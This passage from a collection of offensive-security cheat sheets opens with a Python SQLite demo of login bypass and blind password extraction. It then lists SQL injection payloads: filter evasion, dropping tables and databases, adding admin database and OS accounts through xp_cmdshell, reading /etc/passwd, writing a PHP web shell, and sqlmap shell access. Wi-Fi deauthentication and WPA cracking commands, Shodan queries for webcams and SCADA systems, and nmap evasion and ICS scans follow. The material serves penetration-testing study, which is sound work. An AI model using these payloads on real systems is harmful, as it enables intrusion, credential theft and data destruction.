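    sql = (f"SELECT id, username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return _DB.execute(sql).fetchone()


def login_safe(username, password):
    """Same query with bound parameters: the quote and the comment never
    reach the SQL parser as syntax. (A real app would also compare a
    password hash, not the plaintext stored here for the demo.)"""
    sql = "SELECT id, username FROM users WHERE username=? AND password=?"
    return _DB.execute(sql, (username, password)).fetchone()


def profile_exists(user_id):
    """Boolean oracle: a page that renders differently depending on whether
    the row exists. user_id is concatenated straight into the WHERE clause,
    which is the injection point."""
    rows = _DB.execute(f"SELECT username FROM users WHERE id={user_id}").fetchall()
    return bool(rows)


def blind_extract(oracle, target_sql, max_len=64):
    """Read the string returned by `target_sql` one character at a time
    through a yes/no oracle.

    The cheat sheet narrows each character with range tests (REGEXP '^[a-g]',
    LIKE 'd[0-9]%'); this bisects the code point instead, so about seven
    requests resolve one character. The leading "2 AND" reuses a row that is
    known to exist (id 2), like the "2 and 1=(...) AND ID=2" payloads.
    SQLite's unicode()/substr()/length() play the role of ASCII()/
    SUBSTRING()/LEN() on MSSQL or MySQL.
    """
    # Step 1: length, so the loop knows when to stop (the LEN(USER) probes).
    length = 0
    for n in range(1, max_len + 1):
        if oracle(f"2 AND length(({target_sql}))={n}"):
            length = n
            break
    # Step 2: binary search each character over printable ASCII (32..126).
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"2 AND unicode(substr(({target_sql}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo():
    """Bypass, the same input against the parameterised query, and the
    admin password recovered through the oracle without ever seeing it."""
    bypass = login_vulnerable("admin' --", "wrong")        # -> (1, 'admin')
    blocked = login_safe("admin' --", "wrong")             # -> None
    leaked = blind_extract(profile_exists,
                           "SELECT password FROM users WHERE id=1")
    return bypass, blocked, leaked


if __name__ == "__main__":
    print(demo())
```

Only `--` and `/* */` comments are valid in SQLite, so the `#` payloads from the login-bypass list are MySQL syntax and would fail here. Against a real target the oracle is an HTTP request, and the yes/no answer is read from the response: a timing difference for the WAITFOR variant, or a status code or a string on the page for the boolean variant.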
323 | 324 | ```sh 325 | 1+OR+0x50=0x50 326 | 1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 327 | ``` 328 | 329 | ##### String concatenation 330 | The dangerous keyword is only assembled inside the database, from fragments that no signature matches, and then executed dynamically. 331 | ###### MSSQL 332 | ```sh 333 | '; EXEC ('DRO' + 'P T' + 'AB' + 'LE') 334 | ``` 335 | 336 | ###### Oracle 337 | ```sh 338 | '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' 339 | ``` 340 | 341 | ###### MySQL (needs stacked queries, which most MySQL client APIs disable) 342 | ```sh 343 | '; SET @q = CONCAT('INSE','RT US','ER'); PREPARE s FROM @q; EXECUTE s; -- 344 | ``` 345 | 346 | ##### Manipulating white spaces 347 | A tab, a newline or several spaces between keywords, or no separator at all where the parser tolerates it, defeats a signature written for a single space. 348 | ```sh 349 | UNION SELECT 350 | ``` 351 | ```sh 352 | 'OR'1'='1' 353 | ``` 354 | 355 | ##### Null byte 356 | A leading null byte can make a C-based filter stop reading while the application still passes the whole string to the database. 357 | ```sh 358 | %00' UNION SELECT Password FROM Users WHERE UserName='admin'--' 359 | ``` 360 | 361 | ##### Case variation 362 | SQL keywords are case-insensitive; a case-sensitive signature is not. 363 | ```sh 364 | UnIoN SeLeCt PasSWord fRoM UsErS WhEre useRNAme='JoHn' 365 | ``` 366 | 367 | ##### Declare variable 368 | MSSQL: the statement is assembled in a variable and run with EXEC, so the request never contains it whole. 369 | ```sh 370 | ; declare @sqlvar nvarchar(70); set @sqlvar = (N'UNI' + N'ON' + N' SELECT ' + N'Password'); EXEC(@sqlvar) 371 | ``` 372 | 373 | 374 | 375 | #### Exporting a value with regular expression attack 376 | Boolean-based blind extraction: the page for ID=2 renders normally only when the subquery returns 1, so each request answers one range question and the range is narrowed until a single character is left. 377 | ##### Exporting a value in MySQL 378 | 379 | ###### Check if first character in password is between 'a' and 'g' 380 | 381 | ```sh 382 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-g]' AND ID=2) 383 | ``` 384 | 385 | ###### Check if first character in password is between 'a' and 'h' 386 | 387 | ```sh 388 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-h]' AND ID=2) 389 | ``` 390 | 391 | ###### Check if first character in password is between 'd' and 'f' 392 | 393 | ```sh 394 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[d-f]' AND ID=2) 395 | ``` 396 | 397 | ###### Check if first character in password is 'e' 398 | 399 | ```sh 400 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[e]' AND ID=2) 401 | ``` 402 | 403 | ##### Exporting a value in MSSQL 404 | LIKE with a bracketed character class plays the role of REGEXP; the first character ('d') is already known here. 405 | 406 | ###### Check if second character in password is between 'a' and 'f' 407 | 408 | ```sh 409
| 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[a-f]%' AND ID=2) 410 | ``` 411 | 412 | ###### Check if second character in password is between '0' and '9' 413 | 414 | ```sh 415 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[0-9]%' AND ID=2) 416 | ``` 417 | 418 | ###### Check if second character in password is '4' 419 | 420 | ```sh 421 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[4]%' AND ID=2) 422 | ``` 423 | 424 | #### Creating database accounts 425 | 426 | ##### MySQL 427 | Old MySQL only (5.6 and earlier): from 5.7 the column is authentication_string, and PASSWORD() was removed in 8.0, so use CREATE USER there. 428 | ```sh 429 | INSERT INTO mysql.user (user, host, password) VALUES ('john', 'localhost', PASSWORD('toor')) 430 | ``` 431 | 432 | ##### Microsoft Access 433 | 434 | ```sh 435 | CREATE USER john IDENTIFIED BY 'toor' 436 | ``` 437 | 438 | ##### Microsoft SQL Server 439 | sp_addlogin and sp_addsrvrolemember are kept for backward compatibility; current versions use CREATE LOGIN and ALTER SERVER ROLE. Either way the injected session needs sysadmin rights. 440 | ```sh 441 | exec sp_addlogin 'john', 'toor' 442 | exec sp_addsrvrolemember 'john', 'sysadmin' 443 | ``` 444 | 445 | ##### Oracle 446 | 447 | ```sh 448 | CREATE USER john IDENTIFIED BY toor TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; 449 | GRANT CONNECT TO john; 450 | GRANT RESOURCE TO john; 451 | ``` 452 | 453 | #### Interacting with the operating system 454 | 455 | ##### Creating OS accounts in MSSQL 456 | xp_cmdshell runs commands as the SQL Server service account. It is disabled by default since SQL Server 2005; a sysadmin login can re-enable it with sp_configure. 457 | ###### Create user 458 | ```sh 459 | ';exec master..xp_cmdshell "net user john toor /add";-- 460 | ``` 461 | 462 | ###### Put new user into the administrators group 463 | 464 | ```sh 465 | ';exec master..xp_cmdshell "net localgroup administrators john /add";-- 466 | ``` 467 | 468 | #### Interacting with the file system 469 | MySQL: both operations need the FILE privilege, and secure_file_priv either limits them to one directory or, when NULL, disables them entirely. 470 | ##### Loading a file 471 | 472 | ```sh 473 | NULL UNION ALL SELECT LOAD_FILE('/etc/passwd')/* 474 | ``` 475 | 476 | ##### Writing a file (the empty string is where the PHP code of the shell goes) 477 | ```sh 478 | NULL UNION ALL SELECT NULL,NULL,NULL,NULL,'' INTO OUTFILE '/var/www/custom_path/shell.php'/* 479 | ``` 480 | 481 | #### Manage data 482 | 483 | ##### MSSQL 484 | Stacked queries: the injected statement is appended after the original one and runs with the application's database permissions. 485 | ###### Inserting a row 486 | 487 | ```sh 488 | 1';insert into users values ('john','toor'); -- 489 | ``` 490 | 491 | ###### 
Creating a database 492 | 493 | ```sh 494 | 1';create database mydatabase; -- 495 | ``` 496 | 497 | ###### Deleting a database 498 | 499 | ```sh 500 | 1'; DROP DATABASE mydatabase; -- 501 | ``` 502 | 503 | ###### Deleting a table 504 | 505 | ```sh 506 | 1'; DROP TABLE users; -- 507 | ``` 508 | 509 | #### Using sqlmap 510 | 511 | ##### SQL Injection in a page using a cookie, retrieve databases 512 | 513 | ```sh 514 | sqlmap -u "[HOST]" --cookie="[COOKIE]" --dbs 515 | ``` 516 | -u: Specifies the target URL. 517 | 518 | --cookie: Specifies the HTTP cookie header value. 519 | 520 | --dbs: Enumerates DBMS databases. 521 | 522 | ##### Choose a database and retrieve the tables 523 | 524 | ```sh 525 | sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] --tables 526 | ``` 527 | 528 | ##### Retrieve the rows in a table 529 | 530 | ```sh 531 | sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] -T [TABLE] --dump 532 | ``` 533 | 534 | ##### Getting a shell 535 | 536 | ```sh 537 | sqlmap -u "[HOST]" --cookie="[COOKIE]" --os-shell 538 | ``` 539 | 540 | #### Using DSSS 541 | 542 | ##### SQL Injection in a page using a cookie, retrieve databases 543 | 544 | ```sh 545 | python3 dsss.py -u "[HOST]" --cookie="[COOKIE]" 546 | ``` 547 | -u: Specifies the target URL. 548 | 549 | --cookie: Specifies the HTTP cookie header value. 550 | 551 | 552 | [<- Back to index](README.md) 553 | 554 | --- 555 | ## License 556 | 557 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 558 | 559 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 
560 | 561 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /hacking-wireless-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Hacking wireless cheat sheet 2 | 3 | ### Discover the AP, ESSID, and BSSID of a router with WPS enabled 4 | The interface must be in monitor mode (see airmon-ng below). 5 | ```sh 6 | wash -i [INTERFACE] 7 | ``` 8 | 9 | ### airmon-ng 10 | 11 | #### Kill any conflicting processes 12 | Network managers and wpa_supplicant would otherwise keep resetting the interface. 13 | ```sh 14 | airmon-ng check kill 15 | ``` 16 | 17 | #### Set monitor mode on an interface (creates a monitor-mode virtual adapter) 18 | 19 | ```sh 20 | airmon-ng start [INTERFACE] 21 | ``` 22 | 23 | #### Wizard 24 | 25 | ```sh 26 | airoscript-ng 27 | ``` 28 | 29 | #### De-authentication attack 30 | Sends deauthentication frames so that the client disconnects and reconnects; the WPA handshake of the reconnection can then be captured with airodump-ng. The interface must be on the AP's channel. Omit -c to deauthenticate every client of the AP. 31 | 32 | ```sh 33 | aireplay-ng --deauth 25 -a [AP MAC] -c [TARGET MAC] [INTERFACE] 34 | ``` 35 | 36 | #### Crack WEP password 37 | Needs a capture with enough IVs (typically tens of thousands); the key is recovered statistically, no wordlist required. 38 | ```sh 39 | aircrack-ng 'wireless-data-01.cap' 40 | ``` 41 | 42 | #### Crack WPA2 password 43 | The capture must contain a complete 4-way handshake; the attack is offline dictionary guessing, so it only succeeds if the passphrase is in the wordlist. 44 | ```sh 45 | aircrack-ng -a2 -b [TARGET BSSID] -w dictionary.txt 'wireless-data-01.cap' 46 | ``` 47 | -a: Attack mode. 2=WPA/WPA2-PSK. 48 | 49 | -b: BSSID of the target router. 50 | 51 | -w: Wordlist. 52 | 53 | 54 | [<- Back to index](README.md) 55 | 56 | --- 57 | ## License 58 | 59 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 60 | 61 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option.
62 | 63 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /iot-hacking-cheat-sheets.md: -------------------------------------------------------------------------------- 1 | ## Internet of Things (IoT) hacking cheat sheet 2 | 3 | ### Gathering using Shodan 4 | Shodan search filters; webcamxp matches the banner of the webcamXP camera server software. 5 | #### Search for webcams by country 6 | 7 | ```sh 8 | webcamxp country:"ES" 9 | ``` 10 | 11 | #### Search for webcams by city 12 | 13 | ```sh 14 | webcamxp city:"Barcelona" 15 | ``` 16 | 17 | #### Search for webcams by latitude and longitude 18 | 19 | ```sh 20 | webcamxp geo:"41.3964, 2.1793" 21 | ``` 22 | 23 | #### Search for Modbus-enabled ICS/SCADA systems 24 | 25 | ```sh 26 | port:502 27 | ``` 28 | 29 | #### Search for SCADA systems by vendor name 30 | 31 | ```sh 32 | "Schneider Electric" 33 | ``` 34 | 35 | #### Search for SCADA systems by country 36 | 37 | ```sh 38 | SCADA country:"US" 39 | ``` 40 | 41 | 42 | 43 | 44 | [<- Back to index](README.md) 45 | 46 | --- 47 | ## License 48 | 49 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 50 | 51 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 52 | 53 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Nmap command cheat sheet 2 | 3 | ### General commands 4 | 5 | * -sn: Disables the port scan (host discovery only). 6 | * -v: Enables the verbose output (include all hosts and ports in the output). 7 | * -sV: Detects service versions. 8 | * -A: Enables aggressive scan.
The aggressive scan option supports OS detection (-O), version scanning (-sV), script scanning (-sC), and traceroute (--traceroute). You should not use -A against target networks without permission. 9 | * -p: Specifies the port to be scanned. 10 | * -O: OS detection. 11 | 12 | ### ARP ping scan 13 | 14 | ```sh 15 | nmap -sn -PR [Target IP Address/Range of IP addresses] 16 | ``` 17 | 18 | ### UDP ping scan 19 | 20 | A UDP response means that the host is active. If the target host is offline or unreachable, various error messages such as “host/network unreachable” or “TTL exceeded” could be returned. 21 | ```sh 22 | nmap -sn -PU [Target IP Address/Range of IP addresses] 23 | ``` 24 | 25 | ### ICMP ECHO ping scan 26 | 27 | The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if the ICMP is passing through a firewall. 28 | 29 | ```sh 30 | nmap -sn -PE [Target IP Address/Range of IP addresses] 31 | ``` 32 | 33 | ### Alternative to ICMP ECHO ping scan: ICMP Timestamp and Address Mask Ping Scan 34 | 35 | #### ICMP timestamp ping scan 36 | ```sh 37 | nmap -sn -PP [Target IP Address/Range of IP addresses] 38 | ``` 39 | 40 | #### ICMP address mask ping scan 41 | ```sh 42 | nmap -sn -PM [Target IP Address/Range of IP addresses] 43 | ``` 44 | 45 | #### TCP ACK Ping Scan 46 | This technique sends empty TCP ACK packets to the target host; an RST response means that the host is active. 47 | 48 | ```sh 49 | nmap -sn -PA [Target IP Address/Range of IP addresses] 50 | ``` 51 | 52 | ### IP Protocol Ping Scan 53 | This technique sends different probe packets of different IP protocols to the target host, any response from any probe indicates that a host is active. 
54 | ```sh 55 | nmap -sn -PO [Target IP Address/Range of IP addresses] 56 | ``` 57 | 58 | ### TCP connect/full open scan 59 | ```sh 60 | nmap -sT -v [Target IP Address/Range of IP addresses] 61 | ``` 62 | Completes the three-way handshake through the OS socket API: no privileges needed, but every connection is visible to the application and its logs. 63 | ### Stealth scan/TCP half-open scan 64 | Sends a SYN and answers the SYN/ACK with a RST, so the handshake is never completed and the application never sees a connection (its logs stay clean); a firewall or IDS that inspects packets still sees the probes. Needs raw-socket privileges (root). 65 | ```sh 66 | nmap -sS -v [Target IP Address/Range of IP addresses] 67 | ``` 68 | 69 | ### Xmas scan 70 | Sends a TCP frame to a target system with FIN, URG, and PUSH flags set. No response means the port is open|filtered (open, or the probe was dropped); an RST means the port is closed. Only stacks that follow RFC 793 behave this way: Windows and many network devices answer every such probe with an RST, so all their ports look closed. 71 | ```sh 72 | nmap -sX -v [Target IP Address/Range of IP addresses] 73 | ``` 74 | 75 | ### TCP Maimon scan 76 | A FIN/ACK probe is sent to the target; if there is no response, the port is open|filtered, and if an RST is sent as a response, the port is closed. 77 | ```sh 78 | nmap -sM -v [Target IP Address/Range of IP addresses] 79 | ``` 80 | 81 | ### ACK flag probe scan 82 | Sends an ACK probe packet with a random sequence number; no response implies that the port is filtered (a stateful firewall is present), and an RST response means that the port is unfiltered. It maps firewall rules, not open ports. 83 | ```sh 84 | nmap -sA -v [Target IP Address/Range of IP addresses] 85 | ``` 86 | 87 | ### UDP scan 88 | There is no handshake: a UDP packet is sent to each port. A UDP reply means open; an ICMP port unreachable means closed; no response means open|filtered, which is the common case and is only resolved by probing the service itself (add -sV). Slow, because most stacks rate-limit the ICMP errors. 89 | ```sh 90 | nmap -sU -v [Target IP Address/Range of IP addresses] 91 | ``` 92 | 93 | ### IDLE/IPID Header Scan / Zombie Scan 94 | A TCP port scan that uses a third host (the zombie) with a predictable IP ID sequence: the probes carry the zombie's address, and the target's answers are inferred from how the zombie's IP ID advances, so the target only ever sees the zombie.
95 | ```sh 96 | nmap -sI [ZOMBIE HOST] -v [Target IP Address/Range of IP addresses] 97 | ``` 98 | 99 | Reference: https://nmap.org/book/idlescan.html 100 | 101 | ### SCTP COOKIE ECHO Scan 102 | A COOKIE ECHO chunk is sent to the target host; no response means the port is open|filtered, and an ABORT chunk in response means that the port is closed. 103 | ```sh 104 | nmap -sZ -v [Target IP Address/Range of IP addresses] 105 | ``` 106 | 107 | ### Ping Sweep Scan 108 | Discovers the available hosts and their IP addresses (and MAC addresses, on the local subnet), but no information about the ports. -sP is the legacy spelling of -sn. 109 | 110 | ```sh 111 | nmap -sP [Target IP Address/Range of IP addresses] 112 | ``` 113 | 114 | ### Display the open ports and services running 115 | 116 | ```sh 117 | nmap -T4 -A -v [Target IP Address/Range of IP addresses] 118 | ``` 119 | -T4: Timing template (0-5); 4 is aggressive and appropriate on a fast, reliable network. 120 | -A: Aggressive scan: OS detection, version detection, default NSE scripts, and traceroute. 121 | 122 | ### smb-os-discovery 123 | Attempts to determine the OS, computer name, domain, workgroup, and current time over the SMB protocol 124 | ```sh 125 | nmap --script smb-os-discovery.nse [Target IP Address/Range of IP addresses] 126 | ``` 127 | 128 | ### NetBIOS enumeration 129 | ```sh 130 | nmap -sV -v --script nbstat.nse [Target IP Address/Range of IP addresses] 131 | ``` 132 | 133 | ### Http enum - enumerate the applications, directories, and files in a web server 134 | ```sh 135 | nmap -sV --script http-enum [Target IP Address/Range of IP addresses] 136 | ``` 137 | 138 | ### hostmap-bfk 139 | ```sh 140 | nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- [Target IP Address/Range of IP addresses] 141 | ``` 142 | 143 | ### Http trace 144 | Sends an HTTP TRACE request and reports whether the method is enabled 145 | ```sh 146 | nmap --script http-trace -d [Target IP Address/Range of IP addresses] 147 | ``` 148 | 149 | ### Http frontpage login 150 | ```sh 151 | nmap [Target IP Address/Range of IP addresses] -p 80 --script=http-frontpage-login 152 | ``` 153 | 154
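The discovery and service scans above produce a port and service table per host, and with -oX nmap also writes that table as XML, which is the form to keep and post-process rather than the screen output. The parser below is an added example, not code from the original cheat sheet or from Nmap itself: it reads an inline report (constructed for the demo; the addresses, hostnames and version strings are made up) and returns the confirmed-open services, treating nmap's open|filtered verdict for unanswered UDP probes as ambiguous rather than as open.

```python
"""Parse nmap XML (-oX) into a host/port inventory.

Added example for this cheat sheet, not code from the original page or from
Nmap itself. SAMPLE_XML is a constructed report: the addresses, hostnames
and version strings are made up for the demo.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sSU -sV -oX scan.xml 10.10.10.0/30">
  <host><status state="up" reason="arp-response"/>
    <address addr="10.10.10.1" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="web01.lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.52"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/>
        <service name="snmp"/></port>
    </ports>
  </host>
  <host><status state="up" reason="echo-reply"/>
    <address addr="10.10.10.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="502"><state state="open" reason="syn-ack"/>
        <service name="modbus"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="10.10.10.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: addr, hostname and a port list.

    Each port keeps nmap's own state string (open, closed, filtered,
    open|filtered, ...) plus the service name and product/version when -sV
    identified them. Hosts reported as down are skipped.
    """
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        hostname = host.find("hostnames/hostname")
        ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(
                    x for x in (svc.get("product"), svc.get("version")) if x)
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else "unknown",
                "service": svc.get("name") if svc is not None else None,
                "product": product,
            })
        hosts.append({
            "addr": addr,
            "hostname": hostname.get("name") if hostname is not None else None,
            "ports": ports,
        })
    return hosts


def open_services(hosts, include_ambiguous=False):
    """Flatten to (addr, proto, port, service, product) tuples, sorted.

    Only confirmed-open ports are returned by default. UDP ports that never
    answered are reported by nmap as open|filtered; they are left out unless
    include_ambiguous=True, so a UDP sweep does not inflate the inventory
    with ports nmap could not actually confirm.
    """
    wanted = {"open"}
    if include_ambiguous:
        wanted.add("open|filtered")
    rows = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] in wanted:
                rows.append((h["addr"], p["proto"], p["port"],
                             p["service"], p["product"]))
    return sorted(rows, key=lambda r: r[:3])


if __name__ == "__main__":
    for row in open_services(parse_nmap_xml(SAMPLE_XML), include_ambiguous=True):
        print(row)
```

Run it against a real report with `parse_nmap_xml(open("scan.xml").read())`. The only extra work for a scan saved with the ICS commands further down is the port list; the XML layout is the same for every scan type.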
| ### Http passwd 155 | ```sh 156 | nmap --script http-passwd --script-args http-passwd.root=/ [Target IP Address/Range of IP addresses] 157 | ``` 158 | Checks for directory traversal by trying to retrieve /etc/passwd or boot.ini through the web server; http-passwd.root is the path to traverse from. 159 | ### Check whether a Web Application Firewall is configured on the target host or domain 160 | ```sh 161 | nmap -p80 --script http-waf-detect [Target IP Address/Range of IP addresses] 162 | ``` 163 | 164 | ### Bypassing firewall/IDS 165 | 166 | #### Fragment packets 167 | Splits the probes into tiny IP fragments so that the TCP header is spread over several packets; a filter that does not reassemble fragments cannot see the flags, while the target reassembles the probe once all fragments have arrived. 168 | ```sh 169 | nmap -f [Target IP Address/Range of IP addresses] 170 | ``` 171 | 172 | #### Source port manipulation 173 | Sends the probes from a source port the firewall is likely to trust (some rule sets allow anything coming from well-known ports such as DNS 53 or HTTP 80). Only honoured for raw-packet scan types such as SYN and UDP. 174 | ```sh 175 | nmap -g 80 [Target IP Address/Range of IP addresses] 176 | ``` 177 | 178 | #### Set the Maximum Transmission Unit (MTU) 179 | Like -f, but with a chosen fragment size; the value must be a multiple of 8. 180 | ```sh 181 | nmap --mtu 8 [Target IP Address/Range of IP addresses] 182 | ``` 183 | 184 | #### Decoy 185 | Sends the same probes from spoofed decoy addresses as well as your own, so the target's logs show several apparent sources and the real one cannot be singled out. The real address is placed at a random position among the decoys (use ME in the list to fix its position). Decoys should be live hosts, otherwise the target may be SYN flooded. 186 | 187 | -D: performs a decoy scan. 188 | RND:[number]: generates that many random, non-reserved IP addresses.
189 | ```sh 190 | nmap -D RND:10 [Target IP Address/Range of IP addresses] 191 | ``` 192 | 193 | #### Send binary data as payload 194 | Appends the given bytes to every probe; a filter or IDS keyed on nmap's default, mostly empty probes may let them through. 195 | ```sh 196 | nmap [Target IP Address/Range of IP addresses] --data 0xdeadbeef 197 | ``` 198 | 199 | #### Send string data as payload 200 | ```sh 201 | nmap [Target IP Address/Range of IP addresses] --data-string "dummy string" 202 | ``` 203 | 204 | #### Append random data bytes to most of the packets sent without any protocol-specific payloads 205 | 206 | ```sh 207 | nmap --data-length 5 [Target IP Address/Range of IP addresses] 208 | ``` 209 | 210 | #### Scan in random order 211 | Randomizes the order in which hosts are scanned, so a sequential sweep is less obvious in the logs. 212 | ```sh 213 | nmap --randomize-hosts [Target IP Address/Range of IP addresses] 214 | ``` 215 | 216 | #### Send packets with bad or bogus TCP/UDP checksums 217 | A real host silently drops packets with a bad checksum, so any reply must come from a firewall or IDS that does not verify checksums; this is a probe for such middleboxes, not a port scan. 218 | ```sh 219 | nmap --badsum [Target IP Address/Range of IP addresses] 220 | ``` 221 | 222 | ### Scanning for vulnerabilities 223 | All three run a full 65535-port scan with -A and save the report as XML (-oX) for later processing. 224 | #### Identify the IPv6 capabilities of a device 225 | ```sh 226 | nmap -6 -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses] 227 | ``` 228 | 229 | #### Check for open TCP and UDP services and ports 230 | ```sh 231 | nmap -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses] 232 | ``` 233 | 234 | #### Scan for a specific IP address 235 | ```sh 236 | nmap -n -Pn -sS -pT:0-65535 -v -A -oX [NAME] [Target IP Address] 237 | ``` 238 | 239 | 240 | ### Scanning ICS/SCADA systems 241 | PLCs and other controllers can hang or crash under aggressive scanning: skip host discovery (-Pn), use full connects (-sT), send one probe at a time with a delay between probes, and restrict the port list. 242 | #### Identifying HMI systems 243 | ```sh 244 | nmap -Pn -sT -p 46824 [Target IP address/Range of IP addresses] 245 | ``` 246 | 247 | #### Identifying open ports and services 248 | ```sh 249 | nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p [port list] [Target IP address/Range of IP addresses] 250 | ``` 251 |
256 | #### Scanning Siemens SIMATIC S7 PLCs 257 | ```sh 258 | nmap -Pn -sT -p 102 --script s7-info [Target IP address/Range of IP addresses] 259 | ``` 260 | 261 | #### Scanning EtherNet/IP devices 262 | ```sh 263 | nmap -Pn -sU -p 44818 --script enip-info [Target IP address/Range of IP addresses] 264 | ``` 265 | 266 | #### Scanning Modbus devices 267 | ```sh 268 | nmap -Pn -sT -p 502 --script modbus-discover [Target IP address/Range of IP addresses] 269 | ``` 270 | 271 | #### Scanning BACnet devices 272 | ```sh 273 | nmap -Pn -sU -p 47808 --script bacnet-info [Target IP address/Range of IP addresses] 274 | ``` 275 | 276 | #### Scanning Niagara Fox devices 277 | ```sh 278 | nmap -Pn -sT -p 1911,4911 --script fox-info [Target IP address/Range of IP addresses] 279 | ``` 280 | 281 | #### Scanning Omron PLC devices 282 | ```sh 283 | nmap -Pn -sT -p 9600 --script omron-info [Target IP address/Range of IP addresses] 284 | ``` 285 | 286 | #### Scanning PCWorx devices 287 | ```sh 288 | nmap -Pn -sT -p 1962 --script pcworx-info [Target IP address/Range of IP addresses] 289 | ``` 290 | 291 | #### Scanning ProConOS devices 292 | ```sh 293 | nmap -Pn -sT -p 20547 --script proconos-info [Target IP address/Range of IP addresses] 294 | ``` 295 | 296 | 297 | 298 | ### Protection 299 | 300 | #### Promiscuous detection 301 | ```sh 302 | nmap --script=sniffer-detect [Target IP Address/Range of IP addresses] 303 | ``` 304 | Checks whether a host's network card is in promiscuous mode, i.e. running a sniffer. The script relies on crafted ARP/Ethernet probes, so it is only meaningful on the local network segment. 305 | 306 | [<- Back to index](README.md) 307 | 308 | --- 309 | ## License 310 | 311 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 312 | 313 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option.
314 | 315 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /os-distribution-virual-machines.md: -------------------------------------------------------------------------------- 1 | ## OS distributions / Virtual machines 2 | 3 | ### OS distributions 4 | * [BlackArch Linux](https://blackarch.org/): BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. 5 | * [flare-vm](https://github.com/fireeye/flare-vm): A fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc. 6 | * [HoneyDrive](https://sourceforge.net/projects/honeydrive/): HoneyDrive is the premier honeypot Linux distro. It is a virtual appliance (OVA) with Xubuntu Desktop 12.04.4 LTS edition installed. It contains over 10 pre-installed and pre-configured honeypot software packages such as Kippo SSH honeypot, Dionaea and Amun malware honeypots, Honeyd low-interaction honeypot, Glastopf web honeypot and Wordpot, Conpot SCADA/ICS honeypot, Thug and PhoneyC honeyclients and more. Additionally it includes many useful pre-configured scripts and utilities to analyze, visualize and process the data it can capture, such as Kippo-Graph, Honeyd-Viz, DionaeaFR, an ELK stack and much more. Lastly, almost 90 well-known malware analysis, forensics and network monitoring related tools are also present in the distribution. 7 | * 